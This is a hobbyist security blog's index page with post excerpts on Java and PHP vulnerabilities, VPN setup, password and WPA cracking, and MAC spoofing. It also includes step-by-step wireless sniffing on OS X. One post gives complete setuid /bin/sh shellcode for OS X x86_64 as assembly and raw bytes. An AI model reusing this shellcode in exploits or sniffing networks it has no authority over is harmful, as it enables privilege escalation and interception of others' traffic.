Java Facepalm

It’s been a while since I’ve blogged but I couldn’t resist with the latest Java vulnerability. I saw the proof of concept code posted by jduck last night (here) and thought this looks like normal Java code to me (I develop in Java at my day job). Well it turns out…this is normal Java code!


50 Byte x86_64 OS X setuid execve Null Free Shellcode

More smaller shellcode, this time, tested and verified working on OSX 10.7.


 * Name: setuid_shell_x86_64
 * Qualities: Null-Free
 * Platforms: Mac OS X 10.7 Intel x86_64
 *  Created on: Apr 12, 2012
 *      Author: Dustin Schultz -
char shellcode[] =


; File: setuid_shell_x86_64.asm
; Author: Dustin Schultz -

section .text
global start

mov r8b, 0x02                   ; Unix class system calls = 2
shl r8, 24                      ; shift left 24 to the upper order bits
or r8, 0x17                     ; setuid = 23, or with class = 0x2000017
xor edi, edi                    ; zero out edi, uid = 0
mov rax, r8                     ; syscall number in rax
; mov rax, 0x2000017
syscall                         ; invoke kernel
add r8, 0x24                    ; 0x24+r8=0x200003b
mov rax, r8                     ; syscall number in rax
xor rdx, rdx                    ; zero out rdx, null terminator
; mov rax, 0x200003b
mov rdi, 0x68732f2f6e69622f     ; /bin//sh in hex
push rdx                        ; push backwards, null terminator
push rdi                        ; address of /bin//sh
mov rdi, rsp                    ; null terminated /bin/sh pointer
push rdx                        ; push backwards, null terminator
push rdi                        ; address of /bin//sh
mov rsi, rsp                    ; null terminated /bin/sh pointer
syscall                         ; invoke kernel

To test:

dustin@sholtz:~/$ nasm -f macho64 shell.s 
dustin@sholtz:~/$ ld -static -arch x86_64 shell.o
dustin@sholtz:~/$ ./a.out

Bytes from otool:

dustin@sholtz:~/$ otool -t a.out 
(__TEXT,__text) section
0000000100000f86 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0 
0000000100000f96 0f 05 49 83 c0 24 4c 89 c0 48 31 d2 48 bf 2f 62 
0000000100000fa6 69 6e 2f 2f 73 68 52 57 48 89 e7 52 57 48 89 e6 
0000000100000fb6 0f 05 


Critical PHP Remote Vulnerability Introduced in Fix for PHP Hashtable Collision DOS

One Security Fix Introduces Another

Today, Stefan Esser (@i0n1c) reported a critical remotely exploitable vulnerability in PHP 5.3.9 (update assigned CVE-2012-0830). The funny thing is that this vulnerability was introduced in the fix for the hash collision DOS (CVE-2011-4885) reported in December.

VPNs: Setting up your own IPSEC VPN

This is the second part of a two part article about setting up your own VPN services. In the first article I talked about how to set up an SSL-based VPN server. While SSL-based VPNs are very useful and require no inherit support from the OS, they’re only as good as the supported clients. If there isn’t a client for your device, you’re out of luck. (more…)

Found a PHP IRC Bot in the Wild

Strange Requests

I was grepping through my access logs the other day and noticed several requests like the following


Strange Text File

I decided to take a look at what j1.txt was and discovered that it was a (nicely commented) PHP script that would join an IRC channel and accept commands. The script looks like it was originally coded in English and was later modified by some Indonesians.

I’m not sure exactly what vulnerability is being exploited here but it’s likely a local file inclusion type vulnerability where j1.txt (the PHP code) would end up on the server and could be executed by visiting a certain URL or embedded in the current page at the current URL.


Apache Killer vs

For those of you that haven’t heard (you must live under a rock), there is currently an unpatched DoS attack against all Apache Web servers that can easily be executed from a single computer. A Perl script was posted to the Full Disclosure mailing list last weekend.

I run Apache 2.2 on so I thought it’d be an interesting experiment to see what happens. So, here we go: Apache Killer vs. TheXploit (more…)

Configure a Working SSL Subdomain on WordPress While Still Using CloudFlare

CloudFlare and Securing WordPress Admin


VPNs: Setting up your own SSL VPN

“All I want for Christmas is my own VPN…my own VPN, my own VPN” – Dustin

I’ve been wanting to have access to my own secure VPN for quite some time so that when I’m away from home and only have access to insecure networks, I don’t have to use work’s VPN for personal use or worry about someone intercepting my traffic. I looked into a couple paid VPN solutions but none of them seem to guarantee your privacy as far as I’m concerned. I figured my best option was to setup and manage my own.

Secure WordPress Admin Login Without HTTPS

I use WordPress as my blogging platform and unfortunately I’m on a shared host that charges a lot extra in order to serve HTTPS…even if it’s a self-signed certificate. My only use for HTTPS is logging in to the WordPress administrative console for management and new posts so it doesn’t really make sense to fork over that extra cash. Likewise, I tried the shared certificate provided by my host but that sent WordPress into a redirect loop for some reason.

If you’re in the same boat as me, there are a couple things you can do without spending any money. (more…)

How strong are my passwords?

I think the passwords I use are pretty strong. They’re long, random, alphanumeric, and special characters. I know it’s possible to crack passwords, given enough time, so I thought I’d give it a try. I’m curious how long it’s going to take to crack. (more…)

Ophcrack or Oph-crap?

I did some simple tests tonight using the “free” rainbow tables that come with Ophcrack. I was expecting at least one of my passwords to be cracked but neither were. I think there were a couple reasons for this

  1. The password on my XP machine is 15 characters – Ophcrack only goes up to 14 with the free tables for XP
  2. The password on my Windows 7 machine is not in the dictionary – Ophcrack only uses a “based on dictionary” hybrid table with the free tables for Vista+

The good thing here is that for the “trivial” user, they won’t be able to get my passwords since the non-free tables go for $99 a piece or they’ll need to obtain other tables online.

So is it Ophcrack crap? No, probably not, that would be a little harsh since I bet the free tables would crack a huge majority of the general public’s passwords.

Sniffing Traffic on Your Home Router or Hub

I’ve always knew it was possible to sniff traffic on your home network but every time I tried, I always ended up sniffing ‘management type packets’ (e.g. arp requests, syns, acks, etc). I’d never really seen any useful information come across the wire so I pretty much wrote off the idea of sniffing.

Recently I had done a little deeper dive related to some work I’m doing in class and discovered some of the things I’d done wrong in the past. So here’s a short post on sniffing traffic on your home network. Take a minute to understand the concepts and be responsible with your sniffing activities. (more…)

Online WPA Crackers

Almost everything, in some sense or another, is vulnerable to brute force. It’s just a matter of how long it takes for something to be brute forced that tends to it’s security. I found it pretty interesting that there are now online WPA crackers that will mount dictionary attacks against captured WPA authentication handshakes: (more…)

Change MAC Address on Mac OS X

Changing your MAC address can be useful in main situations. If you’re reading this page, you’re already likely aware of why it’s useful so let me get straight to the details.

Disassociate from an Access Point (AP) without turning off AirPort

nobody@nobody:~$ sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
nobody@nobody:~$ sudo airport -z

Change the MAC address

nobody@nobody:~$ sudo ifconfig en1 ether 00:11:22:33:44:55


Sniff Open Wireless Traffic with Mac OS X

Sniffing open wireless traffic can be pretty interesting and entertaining. It’s amazing to see what gets transferred across a network. Just make sure you’re doing it legally.

Sniffing on Mac OS X is very similar to sniffing on any other operating system with a few small caveats.

1. Install MacPorts

This is the best package manager IMHO for OS X. You’ll need to install Apple XCode Developer tools prior to installing MacPorts. The install page details all that information here It’s all very simple double click and install DMG

2. Install Wireshark

Open a Terminal:

nobody@nobody:~$ sudo port install wireshark

If you just start Wireshark at this point, no interfaces will show up. Your user needs to own /dev/bpf in order to use the interfaces.

3. Create a Startup Script

Create this small script in /usr/bin/wireshark_start

osascript -e "do shell script "chown $USER /dev/bpf*" with administrator privileges";
wireshark &

Give it full execute permissions

nobody@nobody:/usr/bin$ sudo chmod +x wireshark_start
4. Configure Wireshark & Start Sniffing

Start Wireshark

nobody@nobody:~$ wireshark_start

Once Wireshark is open, choose Capture->Options, choose Interface ‘en1′, ensure ‘capture packets in monitor mode’ is enabled, click Start!

You should now be capturing packets. You’re pretty much ‘drinking from a fire hose’ so you need to make sure you utilize Wireshark’s Filter section. e.g. to filter http traffic, type in ‘http’ in the filter box and hit apply.

Go to Top